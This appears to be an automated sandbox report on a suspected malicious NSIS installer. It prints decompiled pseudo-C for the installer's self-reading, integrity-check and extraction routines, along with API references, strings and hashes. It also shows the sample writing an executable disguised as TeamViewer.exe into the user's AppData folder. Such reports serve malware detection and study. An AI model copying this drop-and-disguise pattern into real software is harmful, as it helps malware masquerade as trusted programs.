                                                                                                                        					E00402BD3(1);
                                                                                                                        					if( *0x423eb4 == 0) {
                                                                                                                        						goto L30;
                                                                                                                        					}
                                                                                                                        					if(_v12 == 0) {
                                                                                                                        						L26:
                                                                                                                        						_t110 = GlobalAlloc(0x40, _v20);
                                                                                                                        						E00405F62(0x40afb8);
                                                                                                                        						E0040586C( &_v300, "C:\\Users\\engineer\\AppData\\Local\\Temp\\"); // executed
                                                                                                                        						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                                                                                                                        						 *0x409018 = _t62;
                                                                                                                        						if(_t62 != 0xffffffff) {
                                                                                                                        							_t65 = E004031F1( *0x423eb4 + 0x1c);
                                                                                                                        							 *0x41f054 = _t65;
                                                                                                                        							 *0x417048 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                                                                                        							_t68 = E00402F18(_v16, 0xffffffff, 0, _t110, _v20); // executed
                                                                                                                        							if(_t68 == _v20) {
                                                                                                                        								 *0x423eb0 = _t110;
                                                                                                                        								 *0x423eb8 =  *_t110;
                                                                                                                        								if((_v40 & 0x00000001) != 0) {
                                                                                                                        									 *0x423ebc =  *0x423ebc + 1;
                                                                                                                        								}
                                                                                                                        								_t45 = _t110 + 0x44; // 0x44
                                                                                                                        								_t70 = _t45;
                                                                                                                        								_t101 = 8;
                                                                                                                        								do {
                                                                                                                        									_t70 = _t70 - 8;
                                                                                                                        									 *_t70 =  *_t70 + _t110;
                                                                                                                        									_t101 = _t101 - 1;
                                                                                                                        								} while (_t101 != 0);
                                                                                                                        								_t71 =  *0x417044; // 0x4e5277
                                                                                                                        								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
                                                                                                                        								E004057FE(0x423ec0, _t110 + 4, 0x40);
                                                                                                                        								return 0;
                                                                                                                        							}
                                                                                                                        							goto L30;
                                                                                                                        						}
                                                                                                                        						return "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                                        					}
                                                                                                                        					E004031F1( *0x417040);
                                                                                                                        					if(E004031BF( &_a4, 4) == 0 || _v8 != _a4) {
                                                                                                                        						goto L30;
                                                                                                                        					} else {
                                                                                                                        						goto L26;
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					do {
                                                                                                                        						_t106 = _t109;
                                                                                                                        						asm("sbb eax, eax");
                                                                                                                        						_t82 = ( ~( *0x423eb4) & 0x00007e00) + 0x200;
                                                                                                                        						if(_t109 >= _t82) {
                                                                                                                        							_t106 = _t82;
                                                                                                                        						}
                                                                                                                        						_t83 = E004031BF(0x417050, _t106); // executed
                                                                                                                        						if(_t83 == 0) {
                                                                                                                        							E00402BD3(1);
                                                                                                                        							L30:
                                                                                                                        							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                                                        						}
                                                                                                                        						if( *0x423eb4 != 0) {
                                                                                                                        							if((_a4 & 0x00000002) == 0) {
                                                                                                                        								E00402BD3(0);
                                                                                                                        							}
                                                                                                                        							goto L19;
                                                                                                                        						}
                                                                                                                        						E004057FE( &_v40, 0x417050, 0x1c);
                                                                                                                        						_t89 = _v40;
                                                                                                                        						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                                                                                                                        							_a4 = _a4 | _t89;
                                                                                                                        							_t103 =  *0x417040; // 0x0
                                                                                                                        							 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
                                                                                                                        							_t92 = _v16;
                                                                                                                        							 *0x423eb4 = _t103;
                                                                                                                        							if(_t92 > _t109) {
                                                                                                                        								goto L30;
                                                                                                                        							}
                                                                                                                        							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                                                                                        								_v12 = _v12 + 1;
                                                                                                                        								_t109 = _t92 - 4;
                                                                                                                        								if(_t106 > _t109) {
                                                                                                                        									_t106 = _t109;
                                                                                                                        								}
                                                                                                                        								goto L19;
                                                                                                                        							} else {
                                                                                                                        								goto L22;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						L19:
                                                                                                                        						if(_t109 <  *0x41f050) {
                                                                                                                        							_v8 = E00405EF4(_v8, 0x417050, _t106);
                                                                                                                        						}
                                                                                                                        						 *0x417040 =  *0x417040 + _t106;
                                                                                                                        						_t109 = _t109 - _t106;
                                                                                                                        					} while (_t109 > 0);
                                                                                                                        					goto L22;
                                                                                                                        				}
                                                                                                                        			}





























                                                                                                                        0x00402da6
                                                                                                                        0x00402da9
                                                                                                                        0x00402dae
                                                                                                                        0x00402db0
                                                                                                                        0x00402db0
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00402d9e
                                                                                                                        0x00402dc1
                                                                                                                        0x00402dc7
                                                                                                                        0x00402dd7
                                                                                                                        0x00402dd7
                                                                                                                        0x00402dda
                                                                                                                        0x00402de0
                                                                                                                        0x00402de2
                                                                                                                        0x00000000
                                                                                                                        0x00402d00

                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 00402C86
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\77Etc0bR2v.exe,00000400), ref: 00402CA2
                                                                                                                          • Part of subcall function 0040583D: GetFileAttributesA.KERNELBASE(00000003,00402CB5,C:\Users\user\Desktop\77Etc0bR2v.exe,80000000,00000003), ref: 00405841
                                                                                                                          • Part of subcall function 0040583D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405863
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\77Etc0bR2v.exe,C:\Users\user\Desktop\77Etc0bR2v.exe,80000000,00000003), ref: 00402CEB
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00409130), ref: 00402E32
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C72, 00402E4A
                                                                                                                        • C:\Users\user\Desktop\77Etc0bR2v.exe, xrefs: 00402C8C, 00402C9B, 00402CAF, 00402CCC
                                                                                                                        • soft, xrefs: 00402D62
                                                                                                                        • wRN, xrefs: 00402EF7
                                                                                                                        • Null, xrefs: 00402D6B
                                                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EC9
                                                                                                                        • Error launching installer, xrefs: 00402CC2
                                                                                                                        • "C:\Users\user\Desktop\77Etc0bR2v.exe" , xrefs: 00402C7F
                                                                                                                        • C:\Users\user\Desktop, xrefs: 00402CCD, 00402CD2, 00402CD8
                                                                                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E7B
                                                                                                                        • Inst, xrefs: 00402D59
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                        • String ID: "C:\Users\user\Desktop\77Etc0bR2v.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\77Etc0bR2v.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$wRN
                                                                                                                        • API String ID: 2803837635-3126812384
                                                                                                                        • Opcode ID: 6147c8ce7f916bf316bc462c049502f5517c6654920939d23064a14b970bc3fe
                                                                                                                        • Instruction ID: 0b72a330c31c6d4d52753dad6a5c3012229d4666e6dae103a7747cbc92612fb8
                                                                                                                        • Opcode Fuzzy Hash: 6147c8ce7f916bf316bc462c049502f5517c6654920939d23064a14b970bc3fe
                                                                                                                        • Instruction Fuzzy Hash: B761E231A40215ABDB20DF64DE49B9E7BB4EB04315F20407BF904B62D2D7BC9E458B9C
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 73%
                                                                                                                        			E00401734(FILETIME* __ebx, void* __eflags) {
                                                                                                                        				void* _t33;
                                                                                                                        				void* _t40;
                                                                                                                        				void* _t42;
                                                                                                                        				FILETIME* _t48;
                                                                                                                        				FILETIME* _t60;
                                                                                                                        				void* _t62;
                                                                                                                        				signed int _t68;
                                                                                                                        				FILETIME* _t69;
                                                                                                                        				FILETIME* _t73;
                                                                                                                        				signed int _t75;
                                                                                                                        				void* _t78;
                                                                                                                        				intOrPtr _t80;
                                                                                                                        				void* _t83;
                                                                                                                        
                                                                                                                        				_t73 = __ebx;
                                                                                                                        				_t80 = E004029F6(0x31);
                                                                                                                        				 *((intOrPtr*)(_t83 - 8)) = _t80;
                                                                                                                        				 *(_t83 + 8) =  *(_t83 - 0x24) & 0x00000007;
                                                                                                                        				_t33 = E004056C6(_t80);
                                                                                                                        				_push(_t80);
                                                                                                                        				if(_t33 == 0) {
                                                                                                                        					_push(E00405659(E00405B66(0x409b70, "C:\\Users\\engineer\\AppData\\Roaming\\TeamViewer"), _t34));
                                                                                                                        					L00405B82();
                                                                                                                        				} else {
                                                                                                                        					_push(0x409b70);
                                                                                                                        					__eax = E00405B66();
                                                                                                                        				}
                                                                                                                        				E00405DC8(0x409b70);
                                                                                                                        				while(1) {
                                                                                                                        					__eflags =  *(_t83 + 8) - 3;
                                                                                                                        					if( *(_t83 + 8) >= 3) {
                                                                                                                        						_t62 = E00405E61(0x409b70);
                                                                                                                        						_t75 = 0;
                                                                                                                        						__eflags = _t62 - _t73;
                                                                                                                        						if(_t62 != _t73) {
                                                                                                                        							_t69 = _t62 + 0x14;
                                                                                                                        							__eflags = _t69;
                                                                                                                        							_t75 = CompareFileTime(_t69, _t83 - 0x18);
                                                                                                                        						}
                                                                                                                        						asm("sbb eax, eax");
                                                                                                                        						_t68 =  ~(( *(_t83 + 8) + 0xfffffffd | 0x80000000) & _t75) + 1;
                                                                                                                        						__eflags = _t68;
                                                                                                                        						 *(_t83 + 8) = _t68;
                                                                                                                        					}
                                                                                                                        					__eflags =  *(_t83 + 8) - _t73;
                                                                                                                        					if( *(_t83 + 8) == _t73) {
                                                                                                                        						E0040581E(0x409b70);
                                                                                                                        					}
                                                                                                                        					__eflags =  *(_t83 + 8) - 1;
                                                                                                                        					_t40 = E0040583D(0x409b70, 0x40000000, (0 |  *(_t83 + 8) != 0x00000001) + 1);
                                                                                                                        					__eflags = _t40 - 0xffffffff;
                                                                                                                        					 *(_t83 - 0x34) = _t40;
                                                                                                                        					if(_t40 != 0xffffffff) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					__eflags =  *(_t83 + 8) - _t73;
                                                                                                                        					if( *(_t83 + 8) != _t73) {
                                                                                                                        						E00404F04(0xffffffe2,  *((intOrPtr*)(_t83 - 8)));
                                                                                                                        						__eflags =  *(_t83 + 8) - 2;
                                                                                                                        						if(__eflags == 0) {
                                                                                                                        							 *((intOrPtr*)(_t83 - 4)) = 1;
                                                                                                                        						}
                                                                                                                        						L31:
                                                                                                                        						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t83 - 4));
                                                                                                                        						__eflags =  *0x423f28;
                                                                                                                        						goto L32;
                                                                                                                        					} else {
                                                                                                                        						E00405B66(0x40a370, 0x424000);
                                                                                                                        						E00405B66(0x424000, 0x409b70);
                                                                                                                        						E00405B88(_t73, 0x40a370, 0x409b70, " \"C:\\Users\\engineer\\AppData\\Roaming\\TeamViewer\\TeamViewer.exe\"",  *((intOrPtr*)(_t83 - 0x10)));
                                                                                                                        						E00405B66(0x424000, 0x40a370);
                                                                                                                        						_t60 = E00405427(" \"C:\\Users\\engineer\\AppData\\Roaming\\TeamViewer\\TeamViewer.exe\"",  *(_t83 - 0x24) >> 3) - 4;
                                                                                                                        						__eflags = _t60;
                                                                                                                        						if(_t60 == 0) {
                                                                                                                        							continue;
                                                                                                                        						} else {
                                                                                                                        							__eflags = _t60 == 1;
                                                                                                                        							if(_t60 == 1) {
                                                                                                                        								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
                                                                                                                        								L32:
                                                                                                                        								_t48 = 0;
                                                                                                                        								__eflags = 0;
                                                                                                                        							} else {
                                                                                                                        								_push(0x409b70);
                                                                                                                        								_push(0xfffffffa);
                                                                                                                        								E00404F04();
                                                                                                                        								L29:
                                                                                                                        								_t48 = 0x7fffffff;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					L33:
                                                                                                                        					return _t48;
                                                                                                                        				}
                                                                                                                        				E00404F04(0xffffffea,  *((intOrPtr*)(_t83 - 8)));
                                                                                                                        				 *0x423f54 =  *0x423f54 + 1;
                                                                                                                        				_t42 = E00402F18(_t75,  *((intOrPtr*)(_t83 - 0x1c)),  *(_t83 - 0x34), _t73, _t73); // executed
                                                                                                                        				 *0x423f54 =  *0x423f54 - 1;
                                                                                                                        				__eflags =  *(_t83 - 0x18) - 0xffffffff;
                                                                                                                        				_t78 = _t42;
                                                                                                                        				if( *(_t83 - 0x18) != 0xffffffff) {
                                                                                                                        					L22:
                                                                                                                        					SetFileTime( *(_t83 - 0x34), _t83 - 0x18, _t73, _t83 - 0x18);
                                                                                                                        				} else {
                                                                                                                        					__eflags =  *((intOrPtr*)(_t83 - 0x14)) - 0xffffffff;
                                                                                                                        					if( *((intOrPtr*)(_t83 - 0x14)) != 0xffffffff) {
                                                                                                                        						goto L22;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				FindCloseChangeNotification( *(_t83 - 0x34)); // executed
                                                                                                                        				__eflags = _t78 - _t73;
                                                                                                                        				if(_t78 >= _t73) {
                                                                                                                        					goto L31;
                                                                                                                        				} else {
                                                                                                                        					__eflags = _t78 - 0xfffffffe;
                                                                                                                        					if(_t78 != 0xfffffffe) {
                                                                                                                        						E00405B88(_t73, _t78, 0x409b70, 0x409b70, 0xffffffee);
                                                                                                                        					} else {
                                                                                                                        						E00405B88(_t73, _t78, 0x409b70, 0x409b70, 0xffffffe9);
                                                                                                                        						_push( *((intOrPtr*)(_t83 - 8)));
                                                                                                                        						_push(0x409b70);
                                                                                                                        						L00405B82();
                                                                                                                        					}
                                                                                                                        					_push(0x200010);
                                                                                                                        					_push(0x409b70);
                                                                                                                        					E00405427();
                                                                                                                        					goto L29;
                                                                                                                        				}
                                                                                                                        				goto L33;
                                                                                                                        			}

















                                                                                                                        APIs
                                                                                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00401773
                                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,00409B70,00409B70,00000000,00000000,00409B70,C:\Users\user\AppData\Roaming\TeamViewer,00000000,00000000,00000031), ref: 0040179D
                                                                                                                          • Part of subcall function 00405B66: lstrcpyn.KERNEL32(?,?,00000400,004032AA,004236A0,NSIS Error), ref: 00405B73
                                                                                                                          • Part of subcall function 00404F04: lstrlen.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                                          • Part of subcall function 00404F04: lstrlen.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                                          • Part of subcall function 00404F04: lstrcat.KERNEL32(0041FC78,00402C4A), ref: 00404F60
                                                                                                                          • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                                        Strings
                                                                                                                        • "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe", xrefs: 00401801, 0040181D
                                                                                                                        • C:\Users\user\AppData\Roaming\TeamViewer, xrefs: 00401761
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                        • String ID: "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe"$C:\Users\user\AppData\Roaming\TeamViewer
                                                                                                                        • API String ID: 1941528284-3061885024
                                                                                                                        • Opcode ID: 25b6faa114f588d1f498fd06d837c8ef74ac19732cdb1ade2be67fffb197f127
                                                                                                                        • Instruction ID: ca24b6133afb507e547736dc5ab02d451b7f1a2d30e0a517c5ad6537af4b780a
                                                                                                                        • Opcode Fuzzy Hash: 25b6faa114f588d1f498fd06d837c8ef74ac19732cdb1ade2be67fffb197f127
                                                                                                                        • Instruction Fuzzy Hash: 8441C131900515BBCB10BFB5DD46EAF3A79EF01369B24433BF511B11E1D63C9A418AAD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 93%
                                                                                                                        			E00402F18(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
                                                                                                                        				long _v8;
                                                                                                                        				intOrPtr _v12;
                                                                                                                        				void _t31;
                                                                                                                        				intOrPtr _t32;
                                                                                                                        				int _t35;
                                                                                                                        				long _t36;
                                                                                                                        				int _t37;
                                                                                                                        				long _t38;
                                                                                                                        				int _t40;
                                                                                                                        				int _t42;
                                                                                                                        				long _t43;
                                                                                                                        				long _t44;
                                                                                                                        				long _t55;
                                                                                                                        				long _t57;
                                                                                                                        
                                                                                                                        				_t31 = _a4;
                                                                                                                        				if(_t31 >= 0) {
                                                                                                                        					_t44 = _t31 +  *0x423ef8;
                                                                                                                        					 *0x417044 = _t44;
                                                                                                                        					SetFilePointer( *0x409018, _t44, 0, 0); // executed
                                                                                                                        				}
                                                                                                                        				_t57 = 4;
                                                                                                                        				_t32 = E00403043(_t57);
                                                                                                                        				if(_t32 >= 0) {
                                                                                                                        					_t35 = ReadFile( *0x409018,  &_a4, _t57,  &_v8, 0); // executed
                                                                                                                        					if(_t35 == 0 || _v8 != _t57) {
                                                                                                                        						L23:
                                                                                                                        						_push(0xfffffffd);
                                                                                                                        						goto L24;
                                                                                                                        					} else {
                                                                                                                        						 *0x417044 =  *0x417044 + _t57;
                                                                                                                        						_t32 = E00403043(_a4);
                                                                                                                        						_v12 = _t32;
                                                                                                                        						if(_t32 >= 0) {
                                                                                                                        							if(_a12 != 0) {
                                                                                                                        								_t36 = _a4;
                                                                                                                        								if(_t36 >= _a16) {
                                                                                                                        									_t36 = _a16;
                                                                                                                        								}
                                                                                                                        								_t37 = ReadFile( *0x409018, _a12, _t36,  &_v8, 0); // executed
                                                                                                                        								if(_t37 == 0) {
                                                                                                                        									goto L23;
                                                                                                                        								} else {
                                                                                                                        									_t38 = _v8;
                                                                                                                        									 *0x417044 =  *0x417044 + _t38;
                                                                                                                        									_v12 = _t38;
                                                                                                                        									goto L22;
                                                                                                                        								}
                                                                                                                        							} else {
                                                                                                                        								if(_a4 <= 0) {
                                                                                                                        									L22:
                                                                                                                        									_t32 = _v12;
                                                                                                                        								} else {
                                                                                                                        									while(1) {
                                                                                                                        										_t55 = 0x4000;
                                                                                                                        										if(_a4 < 0x4000) {
                                                                                                                        											_t55 = _a4;
                                                                                                                        										}
                                                                                                                        										_t40 = ReadFile( *0x409018, 0x413040, _t55,  &_v8, 0); // executed
                                                                                                                        										if(_t40 == 0 || _t55 != _v8) {
                                                                                                                        											goto L23;
                                                                                                                        										}
                                                                                                                        										_t42 = WriteFile(_a8, 0x413040, _v8,  &_a16, 0); // executed
                                                                                                                        										if(_t42 == 0 || _a16 != _t55) {
                                                                                                                        											_push(0xfffffffe);
                                                                                                                        											L24:
                                                                                                                        											_pop(_t32);
                                                                                                                        										} else {
                                                                                                                        											_t43 = _v8;
                                                                                                                        											_v12 = _v12 + _t43;
                                                                                                                        											_a4 = _a4 - _t43;
                                                                                                                        											 *0x417044 =  *0x417044 + _t43;
                                                                                                                        											if(_a4 > 0) {
                                                                                                                        												continue;
                                                                                                                        											} else {
                                                                                                                        												goto L22;
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        										goto L25;
                                                                                                                        									}
                                                                                                                        									goto L23;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				L25:
                                                                                                                        				return _t32;
                                                                                                                        			}


















                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402F3F
                                                                                                                        • ReadFile.KERNELBASE(00409130,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000,00000000,00409130), ref: 00402F6C
                                                                                                                        • ReadFile.KERNELBASE(00413040,00004000,?,00000000,00409130,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402FC6
                                                                                                                        • WriteFile.KERNELBASE(00000000,00413040,?,000000FF,00000000,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402FDE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Read$PointerWrite
                                                                                                                        • String ID: @0A$wRN
                                                                                                                        • API String ID: 2113905535-3750349230
                                                                                                                        • Opcode ID: 3fc20a6f8204afd4db5be5275d6ec1a2b538eb21de19a3adc5be7867336c551b
                                                                                                                        • Instruction ID: f0f891dec1baa82fcb152a6e3a42d02399587e043c2e4755ce28507b82245ee9
                                                                                                                        • Opcode Fuzzy Hash: 3fc20a6f8204afd4db5be5275d6ec1a2b538eb21de19a3adc5be7867336c551b
                                                                                                                        • Instruction Fuzzy Hash: 3F315731501249EBDB21CF55DD40A9E7FBCEB843A5F20407AFA05A6190D3789F81DBA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 94%
                                                                                                                        			E00403043(intOrPtr _a4) {
                                                                                                                        				long _v4;
                                                                                                                        				void* __ecx;
                                                                                                                        				intOrPtr _t12;
                                                                                                                        				intOrPtr _t13;
                                                                                                                        				signed int _t14;
                                                                                                                        				void* _t16;
                                                                                                                        				void* _t17;
                                                                                                                        				long _t18;
                                                                                                                        				int _t21;
                                                                                                                        				intOrPtr _t34;
                                                                                                                        				long _t35;
                                                                                                                        				intOrPtr _t37;
                                                                                                                        				void* _t39;
                                                                                                                        				long _t40;
                                                                                                                        				intOrPtr _t53;
                                                                                                                        
                                                                                                                        				_t35 =  *0x417044; // 0x4e5277
                                                                                                                        				_t37 = _t35 -  *0x40afb0 + _a4;
                                                                                                                        				 *0x423eac = GetTickCount() + 0x1f4;
                                                                                                                        				if(_t37 <= 0) {
                                                                                                                        					L23:
                                                                                                                        					E00402BD3(1);
                                                                                                                        					return 0;
                                                                                                                        				}
                                                                                                                        				E004031F1( *0x41f054);
                                                                                                                        				SetFilePointer( *0x409018,  *0x40afb0, 0, 0); // executed
                                                                                                                        				 *0x41f050 = _t37;
                                                                                                                        				 *0x417040 = 0;
                                                                                                                        				while(1) {
                                                                                                                        					_t12 =  *0x417048; // 0x1bbf66
                                                                                                                        					_t34 = 0x4000;
                                                                                                                        					_t13 = _t12 -  *0x41f054;
                                                                                                                        					if(_t13 <= 0x4000) {
                                                                                                                        						_t34 = _t13;
                                                                                                                        					}
                                                                                                                        					_t14 = E004031BF(0x413040, _t34); // executed
                                                                                                                        					if(_t14 == 0) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					 *0x41f054 =  *0x41f054 + _t34;
                                                                                                                        					 *0x40afd0 = 0x413040;
                                                                                                                        					 *0x40afd4 = _t34;
                                                                                                                        					L6:
                                                                                                                        					if( *0x423eb0 != 0 &&  *0x423f40 == 0) {
                                                                                                                        						 *0x417040 =  *0x41f050 -  *0x417044 - _a4 +  *0x40afb0;
                                                                                                                        						E00402BD3(0);
                                                                                                                        					}
                                                                                                                        					 *0x40afd8 = 0x40b040;
                                                                                                                        					 *0x40afdc = 0x8000; // executed
                                                                                                                        					_t16 = E00405F82(0x40afb8); // executed
                                                                                                                        					if(_t16 < 0) {
                                                                                                                        						goto L21;
                                                                                                                        					}
                                                                                                                        					_t39 =  *0x40afd8; // 0x40deec
                                                                                                                        					_t40 = _t39 - 0x40b040;
                                                                                                                        					if(_t40 == 0) {
                                                                                                                        						__eflags =  *0x40afd4; // 0x0
                                                                                                                        						if(__eflags != 0) {
                                                                                                                        							goto L21;
                                                                                                                        						}
                                                                                                                        						__eflags = _t34;
                                                                                                                        						if(_t34 == 0) {
                                                                                                                        							goto L21;
                                                                                                                        						}
                                                                                                                        						L17:
                                                                                                                        						_t18 =  *0x417044; // 0x4e5277
                                                                                                                        						if(_t18 -  *0x40afb0 + _a4 > 0) {
                                                                                                                        							continue;
                                                                                                                        						}
                                                                                                                        						SetFilePointer( *0x409018, _t18, 0, 0); // executed
                                                                                                                        						goto L23;
                                                                                                                        					}
                                                                                                                        					_t21 = WriteFile( *0x409018, 0x40b040, _t40,  &_v4, 0); // executed
                                                                                                                        					if(_t21 == 0 || _t40 != _v4) {
                                                                                                                        						_push(0xfffffffe);
                                                                                                                        						L22:
                                                                                                                        						_pop(_t17);
                                                                                                                        						return _t17;
                                                                                                                        					} else {
                                                                                                                        						 *0x40afb0 =  *0x40afb0 + _t40;
                                                                                                                        						_t53 =  *0x40afd4; // 0x0
                                                                                                                        						if(_t53 != 0) {
                                                                                                                        							goto L6;
                                                                                                                        						}
                                                                                                                        						goto L17;
                                                                                                                        					}
                                                                                                                        					L21:
                                                                                                                        					_push(0xfffffffd);
                                                                                                                        					goto L22;
                                                                                                                        				}
                                                                                                                        				return _t14 | 0xffffffff;
                                                                                                                        			}


















                                                                                                                        0x00403124
                                                                                                                        0x0040312b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040312d
                                                                                                                        0x00403133
                                                                                                                        0x00403135
                                                                                                                        0x00403169
                                                                                                                        0x0040316f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403171
                                                                                                                        0x00403173
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403175
                                                                                                                        0x00403175
                                                                                                                        0x00403188
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403197
                                                                                                                        0x00000000
                                                                                                                        0x00403197
                                                                                                                        0x00403145
                                                                                                                        0x0040314d
                                                                                                                        0x004031a4
                                                                                                                        0x004031aa
                                                                                                                        0x004031aa
                                                                                                                        0x00000000
                                                                                                                        0x00403155
                                                                                                                        0x00403155
                                                                                                                        0x0040315b
                                                                                                                        0x00403161
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403167
                                                                                                                        0x004031a8
                                                                                                                        0x004031a8
                                                                                                                        0x00000000
                                                                                                                        0x004031a8
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 00403058
                                                                                                                          • Part of subcall function 004031F1: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E9D,?), ref: 004031FF
                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000), ref: 0040308B
